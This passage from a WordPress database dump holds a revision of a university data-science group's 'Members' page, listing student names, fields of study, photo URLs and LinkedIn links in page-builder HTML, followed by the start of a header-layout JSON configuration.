225.586 96.68 70.313-14.648 137.695-38.086 196.289-73.242-23.438 70.313-73.242 131.836-134.766 169.922 61.523-8.789 120.117-23.438 175.781-49.805-41.016 61.523-93.75 117.188-152.344 161.133z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c175-outer\">\n            <div data-colibri-id=\"182-c175\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c175 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c176\" class=\"d-block style-922 style-local-182-c176 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bhavya-scaled-1.jpg\" class=\"wp-image-776 style-922-image style-local-182-c176-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-922-frameImage style-local-182-c176-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c177\" class=\"h-global-transition-all h-heading style-914 style-local-182-c177 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c177\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bhavya Busireddy</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c178\" class=\"h-text h-text-component style-915 style-local-182-c178 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c179\" class=\"style-923 style-local-182-c179 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bhavya-busireddy-b052b192/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c180-outer\">\n            <div data-colibri-id=\"182-c180\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c180 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c181\" class=\"d-block style-913 style-local-182-c181 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Vineeth.jpg\" class=\"wp-image-831 style-913-image style-local-182-c181-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c181-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c182\" class=\"h-global-transition-all h-heading style-914 style-local-182-c182 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c182\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Vineeth Kumar Chandha</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c183\" class=\"h-text h-text-component style-915 style-local-182-c183 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c184\" class=\"style-917 style-local-182-c184 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/vineeth-kumar-chandha-207611149/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c185-outer\">\n            <div data-colibri-id=\"182-c185\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c185 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c186\" class=\"d-block style-913 style-local-182-c186 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/04/cropped-sathwik-2-scaled-1.jpg\" class=\"wp-image-1007 style-913-image style-local-182-c186-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c186-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c187\" class=\"h-global-transition-all h-heading style-914 style-local-182-c187 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c187\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sathwik Chowda</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c188\" class=\"h-text h-text-component style-915 style-local-182-c188 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c189\" class=\"style-917 style-local-182-c189 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/sathwikchowda/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c190-outer\">\n            <div data-colibri-id=\"182-c190\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c190 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c191\" class=\"d-block style-913 style-local-182-c191 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Brindal-1.jpeg\" class=\"wp-image-1599 style-913-image style-local-182-c191-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c191-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c192\" class=\"h-global-transition-all h-heading style-914 style-local-182-c192 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c192\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Brindal Dhol</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c193\" class=\"h-text h-text-component style-915 style-local-182-c193 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science\n                      <br>\n                    </p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c194\" class=\"style-917 style-local-182-c194 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/brindaldhol/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c195-outer\">\n            <div data-colibri-id=\"182-c195\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c195 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c196\" class=\"d-block style-913 style-local-182-c196 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-ruby_parcells-scaled-1.jpg\" class=\"wp-image-853 style-913-image style-local-182-c196-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c196-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c197\" class=\"h-global-transition-all h-heading style-914 style-local-182-c197 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c197\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Ruby Parcells</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c198\" class=\"h-text h-text-component style-915 style-local-182-c198 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Geosciences\n                      <br>\n                    </p>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c199-outer\">\n            <div data-colibri-id=\"182-c199\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c199 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c200\" class=\"d-block style-913 style-local-182-c200 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Reshmanjali-1.jpeg\" class=\"wp-image-1600 style-913-image style-local-182-c200-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c200-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c201\" class=\"h-global-transition-all h-heading style-914 style-local-182-c201 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c201\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Sai Reshmanjali</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c202\" class=\"h-text h-text-component style-915 style-local-182-c202 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p><span style=\"font-weight: 400; font-size: 16px; font-family: Open Sans; color: rgb(64, 85, 169);\">Computer Science</span></p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c203\" class=\"style-917 style-local-182-c203 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/reshmanjali-guntupalli/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-3 h-col-md-6 h-col-12 style-912-outer style-local-182-c204-outer\">\n            <div data-colibri-id=\"182-c204\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-912 style-local-182-c204 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"182-c205\" class=\"d-block style-913 style-local-182-c205 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-image__frame-container-outer\">\n                    <div class=\"h-image__frame-container\">\n                      <!---->\n                      <!---->\n                      <img src=\"https://gsudice.dataconn.net/wp-content/uploads/2022/03/cropped-Bronson.png\" class=\"wp-image-817 style-913-image style-local-182-c205-image\">\n                      <div class=\"h-image__frame h-hide-lg h-hide-md h-hide-sm style-913-frameImage style-local-182-c205-frameImage\"></div>\n                    </div>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c206\" class=\"h-global-transition-all h-heading style-914 style-local-182-c206 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-914 style-local-182-c206\">\n                    <!---->\n                    <!---->\n                    <h4 class=\"\">Bronson Tharpe</h4>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c207\" class=\"h-text h-text-component style-915 style-local-182-c207 position-relative h-element\">\n                  <!---->\n                  <!---->\n                  <div class=\"\">\n                    <p>Computer Science</p>\n                  </div>\n                </div>\n                <div data-colibri-id=\"182-c208\" class=\"style-917 style-local-182-c208 position-relative h-element\">\n                  <!---->\n                  <div class=\"d-flex flex-wrap h-social-icons justify-content-lg-center justify-content-md-center justify-content-center\">\n                    <div class=\"social-icon-container d-inline-flex\">\n                      <a href=\"https://www.linkedin.com/in/bronson-tharpe-9b754a1ba/\" h-use-smooth-scroll=\"true\">\n                        <div class=\"icon-container h-social-icon h-global-transition\">\n                          <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                            <!--Icon by Socicon (http://www.socicon.com)-->\n                            <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" viewBox=\"0 0 1500 1500\">\n\n                              <path d=\"M1122.070 767.578c-20.508-23.438-55.664-35.156-105.469-35.156-64.453 0-108.398 20.508-134.766 55.664-26.367 38.086-38.086 90.82-38.086 158.203v512.695c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h260.742c8.789 0 17.578 2.93 23.438 5.859s8.789 11.719 11.719 20.508c0 8.789 2.93 17.578 2.93 20.508s0 11.719 0 23.438c67.383-64.453 158.203-93.75 266.602-93.75 125.977 0 222.656 29.297 292.969 90.82 70.313 64.453 105.469 155.273 105.469 278.32v638.672c0 8.789-2.93 17.578-11.719 26.367-5.859 5.859-17.578 11.719-26.367 11.719h-275.391c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-577.148c0-49.805-8.789-87.891-26.367-114.258zM310.547 313.477c-35.156 35.156-79.102 52.734-128.906 52.734s-93.75-17.578-128.906-52.734c-35.156-35.156-52.734-76.172-52.734-128.906 0-49.805 17.578-90.82 52.734-125.977s79.102-55.664 128.906-55.664c49.805 0 93.75 20.508 128.906 55.664s52.734 76.172 52.734 125.977c0 52.734-17.578 93.75-52.734 128.906zM354.492 512.695v946.289c0 8.789-5.859 17.578-11.719 26.367-8.789 5.859-17.578 11.719-26.367 11.719h-269.531c-8.789 0-17.578-5.859-26.367-11.719-5.859-8.789-11.719-17.578-11.719-26.367v-946.289c0-8.789 5.859-17.578 11.719-26.367 8.789-5.859 17.578-11.719 26.367-11.719h269.531c8.789 0 17.578 5.859 26.367 11.719 5.859 8.789 11.719 17.578 11.719 26.367z\"></path>\n                            </svg>\n                          </div>\n                        </div>\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>','Members','','inherit','closed','closed','','182-revision-v1','','','2023-10-13 10:39:42','2023-10-13 14:39:42','',182,'https://gsudice.dataconn.net/?p=1767',0,'revision','',0),(1768,1,'2023-10-13 10:39:42','2023-10-13 14:39:42','{\"name\":\"hop-header\",\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"anchor\":false,\"backup\":{\"overlap\":{\"menu\":{\"descendants\":{\"item\":{\"margin\":{\"top\":{\"value\":\"0\",\"unit\":\"px\"},\"right\":{\"value\":\"20\",\"unit\":\"px\"},\"bottom\":{\"value\":\"0\",\"unit\":\"px\"},\"left\":{\"value\":\"20\",\"unit\":\"px\"}},\"padding\":{\"top\":{\"value\":\"10\",\"unit\":\"px\"},\"right\":{\"value\":0,\"unit\":\"px\"},\"bottom\":{\"value\":\"10\",\"unit\":\"px\"},\"left\":{\"value\":0,\"unit\":\"px\"}}},\"link\":{\"typography\":{\"weight\":\"600\",\"size\":{\"unit\":\"px\",\"value\":\"14\"},\"transform\":\"uppercase\",\"family\":\"Open Sans\",\"lineHeight\":{\"unit\":\"em\",\"value\":\"1.5\"},\"letterSpacing\":{\"unit\":\"px\",\"value\":\"0\"},\"color\":\"${theme.colors.4}\"},\"states\":{\"hover\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"${theme.colors.0|variant0}\"}}}},\"submenu\":{\"boxShadow\":{\"enabled\":true,\"layers\":[{\"blur\":\"5\",\"color\":\"rgba(0, 0, 0, 0.04)\"}]}},\"submenu-item\":{\"background\":{\"color\":\"rgb(255, 255, 255)\"},\"states\":{\"hover\":{\"background\":{\"color\":\"${theme.colors.0}\"}},\"menuButtonActive\":{\"background\":{\"color\":\"${theme.colors.0}\"}}}},\"submenu-item-link\":{\"states\":{\"hover\":{\"typography\":{\"color\":\"rgb(255, 255, 255)\"}},\"menuButtonActive\":{\"typography\":{\"color\":\"rgb(255, 255, 